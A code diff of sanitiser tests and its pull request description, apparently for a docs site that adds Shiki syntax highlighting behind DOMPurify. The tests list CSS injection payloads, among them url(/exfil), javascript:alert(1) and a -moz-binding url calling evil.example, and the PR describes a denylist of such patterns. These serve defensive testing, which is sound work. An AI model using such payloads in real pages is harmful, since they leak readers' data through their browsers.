-      /<span style="color:#[0-9A-Fa-f]{3,8}">import<\/span>/,
-    );
+    expect(html).toMatch(COLOUR_SPAN_RE);
   });
 
-  it('strips a stray <div style="..."> in inline HTML even though Shiki spans keep theirs', () => {
-    // The PURIFY_CONFIG allowlist widening for Shiki MUST NOT
-    // become a general `style=` allowance on every tag — the
-    // post-sanitize hook narrows the survivors to PRE / CODE / SPAN.
+  // Adversarial allowlist tests — per
+  // `.claude/rules/sanitizer-security.md` §"Testing completeness".
+  // The `style` ADD_ATTR widening is the only attack surface this
+  // PR opens; each blocked tag class needs an explicit test, and
+  // each blocked CSS value pattern needs an explicit test.
+  it('strips style on a <div> outside SHIKI_STYLE_TAGS', () => {
     const html = renderMarkdown(
       '<div style="background:red">payload</div>\n',
       'docs/sdk/README.md',
     );
     expect(html).not.toContain('style="background:red"');
+  });
+
+  it('strips style on an <a> outside SHIKI_STYLE_TAGS', () => {
+    const html = renderMarkdown(
+      '<a href="https://example.com" style="color:red">x</a>\n',
+      'docs/sdk/README.md',
+    );
+    expect(html).not.toMatch(/<a[^>]*\sstyle=/);
+  });
+
+  it('strips style on a <p> outside SHIKI_STYLE_TAGS', () => {
+    const html = renderMarkdown(
+      '<p style="font-size:99px">x</p>\n',
+      'docs/sdk/README.md',
+    );
+    expect(html).not.toMatch(/<p[^>]*\sstyle=/);
+  });
+
+  it('strips style on an SVG child even when USE_PROFILES.html lets it through', () => {
+    // USE_PROFILES.html does NOT enable SVG, so the whole subtree
+    // is stripped. This test pins that posture — if a future
+    // contributor adds `svg: true` to USE_PROFILES, this assertion
+    // catches the regression and forces them through the
+    // sanitiser-security audit before widening the profile.
+    const html = renderMarkdown(
+      '<svg><g style="fill:red"></g></svg>\n',
+      'docs/sdk/README.md',
+    );
+    expect(html).not.toContain('<svg');
+    expect(html).not.toContain('fill:red');
+  });
+
+  it('strips style on PRE/CODE/SPAN when the value contains url() (CSS exfil guard)', () => {
+    // DOMPurify treats `style` as URI-safe and does NOT apply its
+    // URI regex to CSS values. Without the explicit `url(` guard
+    // an authored span like
+    // `<span style="background-image:url(/exfil)">`
+    // would survive into deployed HTML and fire an authenticated
+    // request from every reader's browser. Test each vector
+    // individually.
+    const vectors = [
+      '<span style="background-image:url(/exfil)">x</span>',
+      '<span style="background:url(javascript:alert(1))">x</span>',
+      '<span style="-moz-binding:url(http://evil.example/x)">x</span>',
+      '<span style="behavior:url(#default)">x</span>',
+      // Whitespace + case variations in `url(`.
+      '<span style="background : URL  ( /exfil )">x</span>',
+    ];
+    for (const v of vectors) {
+      const html = renderMarkdown(`${v}\n`, 'docs/sdk/README.md');
+      expect(html, v).not.toMatch(/style=[^>]*url/i);
+    }
+  });
+
+  it('keeps the legitimate Shiki span style (color:#…) intact', () => {
+    // The url() guard must NOT collateral-damage Shiki's own
+    // emitted `color:#XXXXXX` spans. This pins that the guard's
+    // false-positive rate is zero on the actual highlighter
+    // output.
+    const html = renderMarkdown(
+      "```tsx\nconst x = 1;\n```\n",
+      'docs/sdk/tasks/embed-react.md',
+    );
+    expect(html).toMatch(COLOUR_SPAN_RE);
   });
 });


### PR DESCRIPTION
## What

Build-time syntax highlighting for every fenced code block on the
static docs site at `/chordsketch/docs/*`, via Shiki wired into
the existing `marked` → `DOMPurify` pipeline in
`packages/playground/scripts/lib/docs-render.mjs`. Code blocks
land in the generated HTML as
`<pre class="shiki"><code><span style="color:...">`, with the
existing `.docs-prose pre` CSS rule controlling the visual chrome.

Preloaded grammars: `bash`, `json`, `kotlin`, `python`, `ruby`,
`rust`, `shell`, `swift`, `tsx`, `typescript`, plus `ts` / `sh` /
`shellscript` aliases. `chordpro` fences load the in-repo
TextMate grammar at `syntaxes/chordpro.tmLanguage.json` — the
same grammar the VS Code extension and JetBrains plugin already
consume, so on-page docs colour matches what readers see in
their editor. (The Zed extension uses an independent tree-sitter
grammar — out of scope.)

A build-time validator (`assertEveryFenceLangIsLoaded`) walks
every fence header under `docs/sdk/` and **fails the build** if
any lang does not resolve through Shiki — silent fallback to
plain `<pre><code>` cannot ship.

## Why

The recipe pages (especially `embed-react/`, ten copy-paste
recipes for `@chordsketch/react`) are mostly code. Reader
comprehension was bottlenecked on the lack of colour. Going to
Shiki at build time keeps ADR-0021's zero-JS posture intact (the
colouring is baked into the static HTML; no runtime script ships)
and reuses the project's own ChordPro TextMate grammar so the
highlighting story stays consistent with the editor extensions.

ADR-0025 added: documents the choice, alternatives considered
(client-side Prism/highlight.js, build-time tree-sitter,
Pygments, no highlighter), `github-dark` theme selection,
grammar-reuse posture, and watch signals for re-evaluation.

## Security posture

DOMPurify treats `style` as URI-safe and skips its URI regex on
CSS values — so allowing `style` for Shiki's per-token colour
spans opens an exfil surface unless guarded explicitly.

Defence: **fail-closed CSS property:value allowlist**
(`SHIKI_STYLE_DECL_RE` + `isLegitimateShikiStyle`) covering the
full known repertoire of Shiki themes. Anything else
(`url(...)`, `image-set(...)`, `image(...)`, `cross-fade(...)`,
CSS hex-escaped parens `\28`, `@import`, `expression(...)`,
`behavior:`, `-moz-binding`, `var(--x)`, CSS comments,
unrecognised properties) causes full-attribute strip.

Adversarial unit tests cover 14 resource-loading / escape
vectors plus 4 unrecognised-property cases plus a positive-
survivor battery (every property:value pattern Shiki
legitimately emits, including multi-keyword `text-decoration`).
The Playwright smoke asserts `<pre class="shiki">` has no
surviving `style` attribute end-to-end.

`isInvisibleFormatChar` filters every Trojan-Source /
steganography range: BIDI controls + Mongolian VS + FE0F + E0100
supplementary variation selectors + language-tag characters.

## Sister-site audit (per `.claude/rules/fix-propagation.md`)

- `crates/render-html/src/lib.rs::sanitize_tag_attrs` — Rust
  HTML renderer's raw-SVG passthrough surface. Denylist extended
  symmetrically (`image(`, `image-set(`, `cross-fade(`,
  `behavior:`, `-moz-binding`, `\`) with 6 new cargo tests.
- `extractOutline`'s `FENCE_RE` (same module as
  `FENCE_OPEN_RE`) — updated for CommonMark fence parity
  (backtick + tilde + 0–3-space indent + length-aware closing
  fence per §4.5).
- React JSX walker / VS Code preview / render-text / render-pdf
  — no equivalent style channel; they render parsed ChordPro AST
  with no authored-`style` injection path.

## Governance

ADR-0021 (parent) zero-JS posture **preserved verbatim**:
`grep '<script src='` returns nothing on the deployed pages;
single inline `<script>` per page is still the 6-line
hash-redirect shim.

CLAUDE.md "Build Commands" section extended with the playground
subsection (npm test / typecheck / build / build:docs / dev:docs
/ test:e2e + the validator gate per ADR-0025).

ADR-0025 added (Decision, Rationale, Consequences, Alternatives,
References) with measured numbers: corpus longest fence body
1395 bytes (lang-less ASCII diagram in `docs/sdk/README.md`),
longest highlighted fence 743 bytes, build time ~1.4 s
wall-clock for the 18-page corpus.

## Test results

- vitest: **121 passing**.
- playwright (docs config): **28 passing** — two new specs (one
  for embed-react Shiki highlighting + no-style on pre.shiki;
  one for the ChordPro grammar exercised on `./docs/render/`).
- cargo test -p chordsketch-render-html: **281 passing**
  (+6 sister-site style tests).
- typecheck: clean for `packages/playground/`.
- `npm run build:docs`: 18 static pages, zero `<script src>`,
  single inline shim per page.

## Multi-round review process

Five reviewer agents (code, security, silent-failure,
project-rules compliance, test analyzer) ran in parallel across
**four review rounds**. Findings at every severity were resolved
in-PR; the convergence trajectory was the expected ~10 → ~5 → ~1
→ 0 shape from `.claude/rules/pr-workflow.md`.

Closes #2570